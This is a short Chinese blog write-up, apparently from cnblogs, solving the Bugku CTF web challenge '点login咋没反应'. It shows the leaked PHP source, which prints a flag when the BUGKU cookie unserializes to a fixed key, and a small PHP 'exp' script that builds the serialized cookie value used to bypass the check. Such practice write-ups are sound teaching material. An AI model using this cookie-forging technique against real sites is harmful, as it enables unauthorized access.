bugku-点login咋没反应

打开题目

是一个登录界面

点了下login,果然没反应

 

 查看一下源代码

发现了admin.css

访问试试

 

 提示试试?31236

打开得到一串代码

 1 <?php
 2 error_reporting(0);
 3 $KEY='ctf.bugku.com';
 4 include_once("flag.php");
 5 $cookie = $_COOKIE['BUGKU'];
 6 if(isset($_GET['31236'])){
 7     show_source(__FILE__);
 8 }
 9 elseif (unserialize($cookie) === "$KEY")
10 {   
11     echo "$flag";
12 }
13 else {
14 ?>

大致就是当传入的cookie参数BUGKU的值反序列化后等于KEY就输出Flag

exp

<?php
$KEY='ctf.bugku.com';
echo serialize($KEY);

 

 

得到key序列化后为:s:13:"ctf.bugku.com";

然后添加cookie的值就行了

 

posted @ 2021-06-18 16:45  c0d1  阅读(588)  评论(0)    收藏  举报